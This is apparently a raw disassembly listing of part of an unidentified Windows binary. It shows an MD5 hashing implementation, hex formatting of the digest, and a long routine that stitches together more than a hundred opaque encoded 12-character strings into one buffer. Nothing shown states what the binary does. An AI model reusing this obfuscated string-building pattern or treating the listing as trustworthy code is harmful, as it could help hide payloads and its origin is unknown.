mov ebx, edi
xor ebx, eax
add edx, eax
xor ebx, edx
add ebx, [ebp+var_10]
lea ebx, [esi+ebx-1924661Bh]
mov esi, ebx
shr esi, 15h
shl ebx, 0Bh
or esi, ebx
add esi, edx
mov ebx, esi
xor ebx, eax
xor ebx, edx
add ebx, [ebp+var_4]
lea ebx, [edi+ebx+1FA27CF8h]
mov edi, ebx
shr edi, 10h
shl ebx, 10h
or edi, ebx
mov ebx, esi
add edi, esi
xor ebx, edi
xor ebx, edx
add ebx, [ebp+var_38]
lea eax, [eax+ebx-3B53A99Bh]
mov ebx, eax
shl ebx, 17h
shr eax, 9
or ebx, eax
mov eax, esi
add ebx, edi
not eax
or eax, ebx
xor eax, edi
add eax, [ebp+var_40]
lea edx, [edx+eax-0BD6DDBCh]
mov eax, edx
shr eax, 1Ah
shl edx, 6
or eax, edx
mov edx, edi
add eax, ebx
not edx
or edx, eax
xor edx, ebx
add edx, [ebp+var_24]
lea esi, [esi+edx+432AFF97h]
mov edx, esi
shr edx, 16h
shl esi, 0Ah
or edx, esi
mov esi, ebx
add edx, eax
not esi
or esi, edx
xor esi, eax
add esi, [ebp+var_8]
lea edi, [edi+esi-546BDC59h]
mov esi, edi
shr esi, 11h
shl edi, 0Fh
or esi, edi
mov edi, eax
add esi, edx
not edi
or edi, esi
xor edi, edx
add edi, [ebp+var_2C]
lea ebx, [ebx+edi-36C5FC7h]
mov edi, ebx
shl edi, 15h
shr ebx, 0Bh
or edi, ebx
mov ebx, edx
add edi, esi
not ebx
or ebx, edi
xor ebx, esi
add ebx, [ebp+var_10]
lea ebx, [eax+ebx+655B59C3h]
mov eax, ebx
shl ebx, 6
shr eax, 1Ah
or eax, ebx
mov ebx, esi
not ebx
add eax, edi
or ebx, eax
xor ebx, edi
add ebx, [ebp+var_34]
lea ebx, [edx+ebx-70F3336Eh]
mov edx, ebx
shl ebx, 0Ah
shr edx, 16h
or edx, ebx
mov ebx, edi
not ebx
add edx, eax
or ebx, edx
xor ebx, eax
add ebx, [ebp+var_18]
lea ebx, [esi+ebx-100B83h]
mov esi, ebx
shl ebx, 0Fh
shr esi, 11h
or esi, ebx
mov ebx, eax
add esi, edx
not ebx
or ebx, esi
xor ebx, edx
add ebx, [ebp+var_3C]
lea ebx, [edi+ebx-7A7BA22Fh]
mov edi, ebx
shl edi, 15h
shr ebx, 0Bh
or edi, ebx
mov ebx, edx
add edi, esi
not ebx
or ebx, edi
xor ebx, esi
add ebx, [ebp+var_20]
lea ebx, [eax+ebx+6FA87E4Fh]
mov eax, ebx
shr eax, 1Ah
shl ebx, 6
or eax, ebx
mov ebx, esi
add eax, edi
not ebx
or ebx, eax
xor ebx, edi
add ebx, [ebp+var_4]
lea ebx, [edx+ebx-1D31920h]
mov edx, ebx
shr edx, 16h
shl ebx, 0Ah
or edx, ebx
mov ebx, edi
add edx, eax
not ebx
or ebx, edx
xor ebx, eax
add ebx, [ebp+var_28]
lea ebx, [esi+ebx-5CFEBCECh]
mov esi, ebx
shr esi, 11h
shl ebx, 0Fh
or esi, ebx
mov ebx, eax
add esi, edx
not ebx
or ebx, esi
xor ebx, edx
add ebx, [ebp+var_C]
lea ebx, [edi+ebx+4E0811A1h]
mov edi, ebx
shl edi, 15h
shr ebx, 0Bh
or edi, ebx
mov ebx, edx
add edi, esi
not ebx
or ebx, edi
xor ebx, esi
add ebx, [ebp+var_30]
lea ebx, [eax+ebx-8AC817Eh]
mov eax, ebx
shr eax, 1Ah
shl ebx, 6
or eax, ebx
mov ebx, esi
add eax, edi
not ebx
or ebx, eax
xor ebx, edi
add ebx, [ebp+var_14]
lea edx, [edx+ebx-42C50DCBh]
mov ebx, edx
shr ebx, 16h
shl edx, 0Ah
or ebx, edx
mov edx, edi
add ebx, eax
not edx
or edx, ebx
xor edx, eax
add edx, [ebp+var_38]
lea esi, [esi+edx+2AD7D2BBh]
mov edx, esi
shr edx, 11h
shl esi, 0Fh
or edx, esi
mov esi, eax
add edx, ebx
not esi
or esi, edx
xor esi, ebx
add esi, [ebp+var_1C]
lea edi, [edi+esi-14792C6Fh]
mov esi, [ecx+8]
add esi, eax
mov eax, edi
shl eax, 15h
shr edi, 0Bh
or eax, edi
mov [ecx+8], esi
add eax, [ecx+0Ch]
pop edi
pop esi
add eax, edx
mov [ecx+0Ch], eax
mov eax, [ecx+10h]
add eax, edx
mov [ecx+10h], eax
mov eax, [ecx+14h]
add eax, ebx
pop ebx
loc_415353: ; DATA XREF: .text:off_43D40C�o
mov [ecx+14h], eax
leave
retn 4
sub_4149CD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41535A proc near ; CODE XREF: sub_4153ED+66�p
; sub_4153ED+73�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push esi
mov esi, ecx
mov ecx, [ebp+arg_4]
push edi
test ecx, ecx
jz short loc_4153E7
mov eax, [esi]
push ebx
mov edi, eax
push 40h
and edi, 3Fh
pop ebx
add eax, ecx
sub ebx, edi
cmp eax, ecx
mov [esi], eax
jnb short loc_415380
inc dword ptr [esi+4]
loc_415380: ; CODE XREF: sub_41535A+21�j
test edi, edi
jz short loc_4153AF
cmp ecx, ebx
jb short loc_4153AF
push ebx
lea eax, [edi+esi+18h]
push [ebp+arg_0]
push eax
call sub_429420
add esp, 0Ch
lea eax, [esi+18h]
mov ecx, esi
push eax
call sub_4149CD
sub [ebp+arg_4], ebx
add [ebp+arg_0], ebx
mov ecx, [ebp+arg_4]
xor edi, edi
loc_4153AF: ; CODE XREF: sub_41535A+28�j
; sub_41535A+2C�j
cmp ecx, 40h
jb short loc_4153D1
mov ebx, ecx
shr ebx, 6
loc_4153B9: ; CODE XREF: sub_41535A+72�j
push [ebp+arg_0]
mov ecx, esi
call sub_4149CD
sub [ebp+arg_4], 40h
add [ebp+arg_0], 40h
dec ebx
jnz short loc_4153B9
mov ecx, [ebp+arg_4]
loc_4153D1: ; CODE XREF: sub_41535A+58�j
test ecx, ecx
pop ebx
jz short loc_4153E7
push ecx
lea eax, [edi+esi+18h]
push [ebp+arg_0]
push eax
call sub_429420
add esp, 0Ch
loc_4153E7: ; CODE XREF: sub_41535A+C�j
; sub_41535A+7A�j
pop edi
pop esi
pop ebp
retn 8
sub_41535A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4153ED proc near ; CODE XREF: sub_4154D9+24�p
var_8 = byte ptr -8
var_7 = byte ptr -7
var_6 = byte ptr -6
var_5 = byte ptr -5
var_4 = byte ptr -4
var_3 = byte ptr -3
var_2 = byte ptr -2
var_1 = byte ptr -1
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
push esi
mov esi, ecx
push edi
push 38h
mov edi, [esi]
mov eax, [esi+4]
mov ecx, edi
shl eax, 3
shr ecx, 1Dh
or eax, ecx
mov ecx, edi
shl ecx, 3
mov edx, ecx
mov [ebp+var_8], cl
shr edx, 8
mov [ebp+var_7], dl
mov edx, ecx
shr ecx, 18h
mov [ebp+var_5], cl
mov ecx, eax
shr ecx, 8
mov [ebp+var_3], cl
mov [ebp+var_4], al
mov ecx, eax
and edi, 3Fh
shr eax, 18h
mov [ebp+var_1], al
pop eax
shr edx, 10h
shr ecx, 10h
cmp edi, eax
mov [ebp+var_6], dl
mov [ebp+var_2], cl
jb short loc_415449
push 78h
pop eax
loc_415449: ; CODE XREF: sub_4153ED+57�j
sub eax, edi
mov ecx, esi
push eax
push offset dword_442B68
call sub_41535A
lea eax, [ebp+var_8]
push 8
push eax
mov ecx, esi
call sub_41535A
mov eax, [ebp+arg_0]
mov cl, [esi+8]
pop edi
mov [eax], cl
mov ecx, [esi+8]
shr ecx, 8
mov [eax+1], cl
mov cl, [esi+0Ah]
mov [eax+2], cl
mov cl, [esi+0Bh]
mov [eax+3], cl
mov cl, [esi+0Ch]
mov [eax+4], cl
mov ecx, [esi+0Ch]
shr ecx, 8
mov [eax+5], cl
mov cl, [esi+0Eh]
mov [eax+6], cl
mov cl, [esi+0Fh]
mov [eax+7], cl
mov cl, [esi+10h]
mov [eax+8], cl
mov ecx, [esi+10h]
shr ecx, 8
mov [eax+9], cl
mov cl, [esi+12h]
mov [eax+0Ah], cl
mov cl, [esi+13h]
mov [eax+0Bh], cl
mov cl, [esi+14h]
mov [eax+0Ch], cl
mov ecx, [esi+14h]
shr ecx, 8
mov [eax+0Dh], cl
mov cl, [esi+16h]
mov [eax+0Eh], cl
mov cl, [esi+17h]
mov [eax+0Fh], cl
pop esi
leave
retn 4
sub_4153ED endp
; =============== S U B R O U T I N E =======================================
sub_4154D9 proc near ; CODE XREF: sub_4155AA+3E�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, ecx
call sub_4149A9
push [esp+4+arg_0]
call sub_4293A0
pop ecx
push eax
mov ecx, esi
push [esp+8+arg_0]
call sub_41535A
push [esp+4+arg_4]
mov ecx, esi
call sub_4153ED
pop esi
retn 8
sub_4154D9 endp
; =============== S U B R O U T I N E =======================================
sub_415506 proc near ; CODE XREF: sub_4155AA+46�p
arg_0 = dword ptr 4
push esi
push 1
push 28h
call sub_42B39A
mov esi, eax
mov eax, [esp+0Ch+arg_0]
movzx ecx, byte ptr [eax+10h]
push ecx
movzx ecx, byte ptr [eax+0Fh]
push ecx
movzx ecx, byte ptr [eax+0Eh]
push ecx
movzx ecx, byte ptr [eax+0Dh]
push ecx
movzx ecx, byte ptr [eax+0Ch]
push ecx
movzx ecx, byte ptr [eax+0Bh]
push ecx
movzx ecx, byte ptr [eax+0Ah]
push ecx
movzx ecx, byte ptr [eax+9]
push ecx
movzx ecx, byte ptr [eax+8]
push ecx
movzx ecx, byte ptr [eax+7]
push ecx
movzx ecx, byte ptr [eax+6]
push ecx
movzx ecx, byte ptr [eax+5]
push ecx
movzx ecx, byte ptr [eax+4]
push ecx
movzx ecx, byte ptr [eax+3]
push ecx
movzx ecx, byte ptr [eax+2]
push ecx
movzx ecx, byte ptr [eax+1]
movzx eax, byte ptr [eax]
push ecx
push eax
push offset a02x02x02x02x02 ; "%02x%02x%02x%02x%02x%02x%02x%02x%02x%02"...
push esi
call sub_429B03
add esp, 54h
mov eax, esi
pop esi
retn 4
sub_415506 endp
; =============== S U B R O U T I N E =======================================
sub_41557E proc near ; CODE XREF: sub_41499D+3�p
push esi
mov esi, ecx
push 40h
push 0
lea eax, [esi+18h]
push eax
call sub_429760
push 10h
lea eax, [esi+8]
push 0
push eax
call sub_429760
push 8
push 0
push esi
call sub_429760
add esp, 24h
pop esi
retn
sub_41557E endp
; =============== S U B R O U T I N E =======================================
sub_4155AA proc near ; CODE XREF: sub_40A9FE+A41�p
; sub_42045F+222�p
mov eax, offset loc_436312
call sub_42B7CC
push ecx
push esi
push edi
push 58h
call sub_42B4D7
pop ecx
mov ecx, eax
mov [ebp-10h], ecx
xor esi, esi
cmp ecx, esi
mov [ebp-4], esi
jz short loc_4155D4
call sub_41499D
mov esi, eax
loc_4155D4: ; CODE XREF: sub_4155AA+21�j
or dword ptr [ebp-4], 0FFFFFFFFh
push 11h
call sub_42B4D7
pop ecx
mov edi, eax
push edi
mov ecx, esi
push dword ptr [ebp+8]
call sub_4154D9
push edi
mov ecx, esi
call sub_415506
mov ecx, [ebp-0Ch]
pop edi
pop esi
mov large fs:0, ecx
leave
retn
sub_4155AA endp
; =============== S U B R O U T I N E =======================================
sub_415603 proc near ; CODE XREF: sub_41CDD4+40�p
; sub_41CE4A+40�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
push esi
test eax, eax
jz short loc_41563F
mov esi, [esp+4+arg_4]
test esi, esi
jz short loc_41563F
cmp byte ptr [eax], 0
jz short loc_41563F
cmp byte ptr [esi], 0
jz short loc_41563F
push edi
push esi
push eax
call sub_4170D6
mov edi, eax
push edi
push offset aS_3 ; "+%s"
push esi
call dword_437278 ; wsprintfA
push edi
call sub_4290D0
add esp, 18h
pop edi
loc_41563F: ; CODE XREF: sub_415603+7�j
; sub_415603+F�j ...
pop esi
retn
sub_415603 endp
; =============== S U B R O U T I N E =======================================
sub_415641 proc near ; CODE XREF: sub_41567F+C�p
; sub_41567F+17�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
push esi
test eax, eax
jz short loc_41567D
mov esi, [esp+4+arg_4]
test esi, esi
jz short loc_41567D
cmp byte ptr [eax], 0
jz short loc_41567D
cmp byte ptr [esi], 0
jz short loc_41567D
push edi
push esi
push eax
call sub_417212
mov edi, eax
push edi
push offset aS_5 ; "%s"
push esi
call dword_437278 ; wsprintfA
push edi
call sub_4290D0
add esp, 18h
pop edi
loc_41567D: ; CODE XREF: sub_415641+7�j
; sub_415641+F�j ...
pop esi
retn
sub_415641 endp
; =============== S U B R O U T I N E =======================================
sub_41567F proc near ; CODE XREF: sub_418E0F+7D�p
push esi
mov esi, offset dword_443EB0
push offset dword_445B40
push esi
call sub_415641
push offset dword_445B50
push esi
call sub_415641
push offset dword_445B60
push esi
call sub_415641
push offset a7lybp1gunfm0 ; "7LybP1GuNfm0"
push esi
call sub_415641
push offset a391myLxl28_ ; "391mY/LxL28."
push esi
call sub_415641
push offset a5h5br_qpSm1 ; "5H5BR.qp/sm1"
push esi
call sub_415641
push offset aYjmlc1btsf10_0 ; "yJmlc1btsF10"
push esi
call sub_415641
push offset aZyvgp1mxobt0_0 ; "zyVGp1MxObt0"
push esi
call sub_415641
add esp, 40h
push offset aG7IvGks9l1_0 ; "g7/IV/gks9L1"
push esi
call sub_415641
push offset aTugnf_mqsdr0_0 ; "TuGNF.mQSDR0"
push esi
call sub_415641
push offset aBwIj0rhpgj1 ; "bw/Ij0rhPgj1"
push esi
call sub_415641
push offset aFuv1h_fi8sc ; "FuV1H.fi8SC/"
push esi
call sub_415641
push offset aLcxMHdpwr1 ; "lCX/m/HdpWr1"
push esi
call sub_415641
push offset aVozbg0sssom1 ; "vozbG0sSsoM1"
push esi
call sub_415641
push offset aKc4l5_savs3_ ; "KC4L5.sAVS3."
push esi
call sub_415641
push offset aWk12f0zbpla ; "wK12F0ZBpla/"
push esi
call sub_415641
add esp, 40h
push offset aSpxmrGVbi0 ; "spxMr/G/vBI0"
push esi
call sub_415641
push offset a2nru_kpknx ; "/2nRu.KpKNx/"
push esi
call sub_415641
push offset a7lybp1gunfm0_0 ; "7LybP1GuNfm0"
push esi
call sub_415641
push offset a391myLxl28__0 ; "391mY/LxL28."
push esi
call sub_415641
push offset a5h5br_qpSm1_0 ; "5H5BR.qp/sm1"
push esi
call sub_415641
push offset aYjmlc1btsf10 ; "yJmlc1btsF10"
push esi
call sub_415641
push offset aZyvgp1mxobt0 ; "zyVGp1MxObt0"
push esi
call sub_415641
push offset aG7IvGks9l1 ; "g7/IV/gks9L1"
push esi
call sub_415641
add esp, 40h
push offset aTugnf_mqsdr0 ; "TuGNF.mQSDR0"
push esi
call sub_415641
push offset aBwIj0rhpgj1_0 ; "bw/Ij0rhPgj1"
push esi
call sub_415641
push offset aFuv1h_fi8sc_0 ; "FuV1H.fi8SC/"
push esi
call sub_415641
push offset aLcxMHdpwr1_0 ; "lCX/m/HdpWr1"
push esi
call sub_415641
push offset aVozbg0sssom1_0 ; "vozbG0sSsoM1"
push esi
call sub_415641
push offset aKc4l5_savs3__0 ; "KC4L5.sAVS3."
push esi
call sub_415641
push offset aDJstMfgyq_ ; "d/Jst/MFgyQ."
push esi
call sub_415641
push offset aErwc30qfw_p0 ; "eRWc30Qfw.P0"
push esi
call sub_415641
add esp, 40h
push offset a86tb1fspjg0 ; "86tb/1FSpjg0"
push esi
call sub_415641
push offset aPlsymAee6v1 ; "PlsYM/aEe6v1"
push esi
call sub_415641
push offset aDehziSaO0 ; "deHZI/SA//o0"
push esi
call sub_415641
push offset aOb4iqKj5ue_ ; "Ob4iQ/KJ5ue."
push esi
call sub_415641
push offset aNfknl0nqigy0 ; "NFKNL0nQigY0"
push esi
call sub_415641
push offset aE0idd0rdw2u ; "e0idD0RDw2U/"
push esi
call sub_415641
push offset aEuior0ay2w7__0 ; "EUIOR0ay2w7."
push esi
call sub_415641
push offset aPdazx1odsoh0 ; "PDazX1oDSOh0"
push esi
call sub_415641
add esp, 40h
push offset aUc6wg1ovwvt1 ; "uc6Wg1OvWVt1"
push esi
call sub_415641
push offset aDj9owUmrbd_ ; "dJ9OW/uMRBD."
push esi
call sub_415641
push offset aP00ls0k4t_n1 ; "P00Ls0K4t.N1"
push esi
call sub_415641
push offset aL3nyw_d7tfl_ ; "l3nYW.D7Tfl."
push esi
call sub_415641
push offset aQc9zs1zgzff0 ; "Qc9zS1zGZff0"
push esi
call sub_415641
push offset aWpuwr_6yfru ; "WpuWr.6YFRU/"
push esi
call sub_415641
push offset a4rmbzFcic21 ; "4RmBz/FCic21"
push esi
call sub_415641
push offset aSc_coSwlk_ ; "SC.Co/swLK/."
push esi
call sub_415641
add esp, 40h
push offset aLees11vpbnf0 ; "LeEs11vPbnf0"
push esi
call sub_415641
push offset aLbjvg0r_qmb_ ; "lbJVg0r.qMb."
push esi
call sub_415641
push offset aA52n11svyfw0 ; "A52N11SVYFw0"
push esi
call sub_415641
push offset aHj6vo0jrp9q0 ; "Hj6vo0JRP9Q0"
push esi
call sub_415641
push offset aR7wrsQhek_0 ; "r7WRs/qHek.0"
push esi
call sub_415641
push offset aDuzcb0kgssv0 ; "DuzCb0KgSsv0"
push esi
call sub_415641
push offset aDqjso_47pdb ; "dQJSO.47pdb/"
push esi
call sub_415641
push offset aK9vUKkutm ; "K9V/U/KkuTM/"
push esi
call sub_415641
add esp, 40h
push offset a7yfnz0pw11s1 ; "7yfnz0PW11s1"
push esi
call sub_415641
push offset aNq_as1z1sit ; "nQ.As1Z1SIt/"
push esi
call sub_415641
push offset aUn3hk0sn58o_0 ; "uN3hk0sn58o/"
push esi
call sub_415641
push offset aQrn4z10ge1i1_0 ; "QRn4z10ge1I1"
push esi
call sub_415641
push offset aIegud0v_5_ ; "iEguD0V/.5/."
push esi
call sub_415641
push offset aFc9kk1jx11g_ ; "fc9Kk1jX11G."
push esi
call sub_415641
push offset aDnjq8Ze3zw ; "DnjQ8/ze3ZW/"
push esi
call sub_415641
push offset aEwqxaOc1t_ ; "EWqxA//oC1T."
push esi
call sub_415641
add esp, 40h
push offset aJiatz0xsump1 ; "JIAtz0xSuMp1"
push esi
call sub_415641
push offset aVi0qa1mvfro1 ; "VI0QA1mvfro1"
push esi
call sub_415641
push offset aW3gp6_13acy1 ; "W3GP6.13AcY1"
push esi
call sub_415641
push offset aE8qiq0hukv9 ; "e8qiq0Hukv9/"
push esi
call sub_415641
push offset a18rjk_sa2je ; "18Rjk.sa2JE/"
push esi
call sub_415641
push offset aLjAmKzrtp1 ; "lJ/am/kZRtP1"
push esi
call sub_415641
push offset aXzaru0amxhi_ ; "XZArU0aMxhi."
push esi
call sub_415641
push offset aRa7e2Hhxpf0 ; "rA7E2/hHXPf0"
push esi
call sub_415641
add esp, 40h
push offset aRp4sr11cvr1 ; "Rp4sR11CvR1/"
push esi
call sub_415641
push offset aZqrvt0t6nmz_ ; "ZqrVt0t6nmZ."
push esi
call sub_415641
push offset a1shta0bzfwk1 ; "1ShtA0bzFwk1"
push esi
call sub_415641
push offset aAzcsp_hkilo_ ; "AZcsP.hkiLO."
push esi
call sub_415641
push offset aFepmfZswfd ; "FEpMF/ZswFD/"
push esi
call sub_415641
push offset aSud8hRsu8j1 ; "sUd8h/rsu8j1"
push esi
call sub_415641
push offset aJ2yyw_j09xc ; "j2yYw.J09XC/"
push esi
call sub_415641
push offset a43ucs0rkqux_ ; "43uCS0rkQUx."
push esi
call sub_415641
add esp, 40h
push offset aJc8j0_blhir0 ; "jC8j0.blHIr0"
push esi
call sub_415641
push offset aPiygc_bgpyh_ ; "PIYGC.BgPyH."
push esi
call sub_415641
push offset a7bqzu_aqz2u_ ; "7bQzU.aQz2u."
push esi
call sub_415641
push offset aSar5v0jloic0 ; "saR5v0JloIc0"
push esi
call sub_415641
push offset aX43mxEgedu_ ; "x43Mx/eGeDu."
push esi
call sub_415641
push offset aIsopf_pu4ty0 ; "IsoPF.PU4tY0"
push esi
call sub_415641
push offset a98mu_Nedn7_ ; "98mu./nEdn7."
push esi
call sub_415641
push offset aVdirq_mjcpx1 ; "vDIrQ.MJcpx1"
push esi
call sub_415641
add esp, 40h
push offset aSad25HpR91 ; "Sad25/hP/R91"
push esi
call sub_415641
push offset aVsz2xXqjp5 ; "Vsz2x/xqJP5/"
push esi
call sub_415641
push offset aPnb_aBfzu60_0 ; "pNb.a/Bfzu60"
push esi
call sub_415641
push offset aI7atf_8Tag1 ; "i7Atf.8/tag1"
push esi
call sub_415641
push offset aDo5oa0u5m7_ ; "dO5oA/0U5m7."
push esi
call sub_415641
push offset aS3dyJzo6r_0 ; "s3dY//JZo6r/"
push esi
call sub_415641
push offset aKe3l20ufrlq0 ; "kE3L20Ufrlq0"
push esi
call sub_415641
push offset aVp1weJvqbn_ ; "VP1WE/JVQbn."
push esi
call sub_415641
add esp, 40h
push offset aUaxwg1w8vsp0qr ; "UaxWg1w8vSP0QRn4z10ge1I1"
push esi
call sub_415641
push offset aQbwgd0cfxf_ ; "qbwGd0CFxf./"
push esi
call sub_415641
push offset a2mo7g0_b0qj ; "2mo7G0.B0qj/"
push esi
call sub_415641
push offset a47ff020f_0_ ; "47Ff/020f.0."
push esi
call sub_415641
push offset aHyomeIovtv_ ; "HyOMe/iovtV."
push esi
call sub_415641
push offset aPlsymAee6v1_0 ; "PlsYM/aEe6v1"
push esi
call sub_415641
push offset aCwxyh0ryouv1 ; "CwXYh0RYoUv1"
push esi
call sub_415641
push offset aEavyh_ic0dc0 ; "eAvYh.IC0dc0"
push esi
call sub_415641
add esp, 40h
push offset aUz3rf_vtkug1 ; "uz3rf.VTKug1"
push esi
call sub_415641
push offset aMaeyv0bdsgj0 ; "MAEyv0BdSGj0"
push esi
call sub_415641
push offset aI3ncg_v5u4g_ ; "I3nCG.v5U4g."
push esi
call sub_415641
push offset a9bwj__lz2my0 ; "9bWj..lZ2My0"
push esi
call sub_415641
push offset aRiocl1kztwo0 ; "rioCl1kzTWO0"
push esi
call sub_415641
push offset a_swwg1hqeii1 ; ".SWwg1hqeiI1"
push esi
call sub_415641
loc_415B66: ; DATA XREF: .text:off_443F18�o
push offset aG3obv_r6j7h ; "g3obv.r6j7H/"
push esi
call sub_415641
push offset aM5spx_qp7lx_ ; "M5sPX.Qp7Lx."
push esi
call sub_415641
add esp, 40h
push offset aItx_n_wpamx_ ; "ITx.N.WPAmx."
push esi
call sub_415641
push offset aLndk50vzcqw0 ; "LNdk50vzCqW0"
push esi
call sub_415641
push offset a9ljbh07crkd_ ; "9lJBH07crkD."
push esi
call sub_415641
push offset aAjttz06ztse1 ; "ajTtz06Ztse1"
push esi
call sub_415641
push offset aUn3hk0sn58o ; "uN3hk0sn58o/"
push esi
call sub_415641
push offset aQrn4z10ge1i1 ; "QRn4z10ge1I1"
push esi
call sub_415641
push offset aBvuso0ed3mw ; "bVUSO0ed3MW/"
push esi
call sub_415641
push offset aM1d_716jg1r1 ; "M1d.716Jg1r1"
push esi
call sub_415641
add esp, 40h
push offset a6x2ka0buubb_ ; "6x2Ka0buUbB."
push esi
call sub_415641
push offset aUqyil_iyvpi_ ; "uQYiL.iYvpI."
push esi
call sub_415641
push offset a4qyyh1q2ps1 ; "4QyYH1q/2ps1"
push esi
call sub_415641
push offset aZgidu12tiv0 ; "ZGidU12tiV0/"
push esi
call sub_415641
push offset aHgcrw_cwuf5_ ; "HGCRW.CWUF5."
push esi
call sub_415641
push offset aGztle_nhywf ; "gzTlE.nhywf/"
push esi
call sub_415641
push offset aTvjro1ubgtg1 ; "TVJrO1uBGtg1"
push esi
call sub_415641
push offset aL80reUvcue1 ; "l80re/UvCUe1"
push esi
call sub_415641
add esp, 40h
push offset aVxa_uCdd7s0 ; "VXA.u/cDD7S0"
push esi
call sub_415641
push offset aH1cmq0wqw5c_ ; "h1cMQ0wQw5C."
push esi
call sub_415641
push offset aSxytb1_eejq_ ; "SXYtb1.EEjQ."
push esi
call sub_415641
push offset aVb1r0N_arr0 ; "vB1r0/N.Arr0"
push esi
call sub_415641
push offset a8im6i__c829_ ; "8Im6i..C829."
push esi
call sub_415641
push offset aTiyj208fhvn_ ; "tIYj208FHvN."
push esi
call sub_415641
push offset a5ngN0zjh2i1 ; "5nG/N0ZJh2i1"
push esi
call sub_415641
push offset aMdf9n0kzpx60 ; "mdf9n0kzPX60"
push esi
call sub_415641
add esp, 40h
push offset aAtfv_jgk0x1 ; "/ATfv.jgK0X1"
push esi
call sub_415641
push offset aFu6k10irsc1 ; "fu6k10iRsc/1"
push esi
call sub_415641
push offset a_luua_bruje0 ; ".lUua.bruje0"
push esi
call sub_415641
push offset aKzqshDhric_ ; "kzqSH/dhRIc."
push esi
call sub_415641
push offset aUycsBekwp0 ; "/uYcs/BEKWP0"
push esi
call sub_415641
push offset aWwfbf_0ptze_ ; "WWFBf.0ptzE."
push esi
call sub_415641
push offset aFhzdv1ootfg0 ; "fhzdV1OotFg0"
push esi
call sub_415641
push offset aUmk7x0pwyw9Qrn ; "Umk7x0PwyW9/QRn4z10ge1I1"
push esi
call sub_415641
add esp, 40h
push offset aHpmch0pbq800 ; "HPmCH0PbQ800"
push esi
call sub_415641
push offset aUfbss0cbo8c__0 ; "uFbSS0Cbo8C."
push esi
call sub_415641
push offset aNoazx1alvg0 ; "NoaZx1Alvg/0"
push esi
call sub_415641
push offset a7fugu_n0u2m1 ; "7FUgU.N0U2m1"
push esi
call sub_415641
push offset aW3dwl46o0u0 ; "w3dWL/46o0u0"
push esi
call sub_415641
push offset aUbqs_hzpkh1 ; "/uBQS.HZPkh1"
push esi
call sub_415641
push offset a6x7zf1eztny_ ; "6x7zf1EztnY."
push esi
call sub_415641
push offset a7otcu0fic6v0 ; "7otcU0FiC6V0"
push esi
call sub_415641
add esp, 40h
push offset aFyflu0ji3xh_ ; "FyFlU0jI3XH."
push esi
call sub_415641
push offset aDnjyk0fwki__ ; "dnjYk0fWkI.."
push esi
call sub_415641
push offset aXmz20Gjkq ; "xMz20//gJkQ/"
push esi
call sub_415641
push offset aNhr6r0qsk450 ; "nHr6r0qsk450"
push esi
call sub_415641
push offset aX_62c_3ldcp ; "X.62C.3LDCP/"
push esi
call sub_415641
push offset aWt4rnWgl6v_ ; "wt4Rn/WGL6V."
push esi
call sub_415641
push offset aImvbw1shwxq0 ; "iMvbW1SHwxQ0"
push esi
call sub_415641
push offset a4h4m_q_guy_ ; "4h4m/.Q.GUy."
push esi
call sub_415641
add esp, 40h
push offset aPsern1aagh6_ ; "pSern1AAGh6."
push esi
call sub_415641
push offset aXkg84_cesgs_ ; "XkG84.cESgs."
push esi
call sub_415641
push offset aUyfog_dvvny0 ; "UyfOG.DvVnY0"
push esi
call sub_415641
push offset aP06vqBfbmo_ ; "p06vq/BFBMo."
push esi
call sub_415641
push offset a3vvsv1vurua ; "3VVsV1VuRUA/"
push esi
call sub_415641
push offset aW1w2v121jsp_ ; "w1w2V121JSP."
push esi
call sub_415641
push offset aVz62d1m0yya ; "Vz62d1m0Yya/"
push esi
call sub_415641
push offset aF4c9z1ubcg80 ; "F4c9z1UBCg80"
push esi
call sub_415641
add esp, 40h
push offset a2yclo0srxpi ; "2YClO0SRxpi/"
push esi
call sub_415641
push offset aH3yh9_xq_s2_ ; "h3YH9.Xq.S2."
push esi
call sub_415641
push offset aIwbkf0o1om6Qrn ; "IwBKf0O1Om6/QRn4z10ge1I1"
push esi
call sub_415641
push offset aKmdie1uwntq ; "KmdIe1UwntQ/"
push esi
call sub_415641
push offset aUpx0wCz2ei0qrn ; "UPx0W/cz2EI0QRn4z10ge1I1"
push esi
call sub_415641
push offset aV6jbh0k4uD_ ; "V6jBH0k4u/d."
push esi
call sub_415641
push offset aB2smo_whkew_qr ; "B2smo.WHkeW.QRn4z10ge1I1"
push esi
call sub_415641
push offset aVxg7n_qbmg90aa ; "vXG7N.qBMG90aA/Td0EX07M1"
push esi
call sub_415641
add esp, 40h
push offset aEm42x_1iszi1 ; "Em42x.1IsZI1"
push esi
call sub_415641
push offset aErnniHm17t1qrn ; "ERNNi/HM17T1QRn4z10ge1I1"
push esi
call sub_415641
push offset aQ5l5f_2to_60 ; "q5l5f.2TO.60"
push esi
call sub_415641
push offset aJbkl4Fbwcf1 ; "jBKL4/FbWCF1"
push esi
call sub_415641
push offset aW3gp6_13acy1_0 ; "W3GP6.13AcY1"
push esi
call sub_415641
push offset aM08se_kt9td1 ; "M08SE.Kt9tD1"
push esi
call sub_415641
push offset a3eowx2ocng ; "3eowX/2OCnG/"
push esi
call sub_415641
push offset aS3dyJzo6r ; "s3dY//JZo6r/"
push esi
call sub_415641
add esp, 40h
push offset aUwher1dagd80 ; "UWher1DAGD80"
push esi
call sub_415641
push offset aPnb_aBfzu60 ; "pNb.a/Bfzu60"
push esi
call sub_415641
push offset aZu2s6_o7_yt ; "Zu2s6.O7.yt/"
push esi
call sub_415641
push offset a4hftz6holr ; "4hftZ/6HOlR/"
push esi
call sub_415641
push offset aYqrdp_9rf4u0 ; "yqrdP.9rF4U0"
push esi
call sub_415641
push offset a1uyis15kh_n1 ; "1UyIs15KH.n1"
push esi
call sub_415641
push offset a9ljbh07crkd__0 ; "9lJBH07crkD."
push esi
call sub_415641
push offset aD0ron_ctdg0_ ; "D0roN.CTDg0."
push esi
call sub_415641
add esp, 40h
push offset aFr8ri0f9nfz_ ; "fr8ri0f9NfZ."
push esi
call sub_415641
push offset aWbzcx0Dknt_ ; "wbZcx0/Dknt."
push esi
call sub_415641
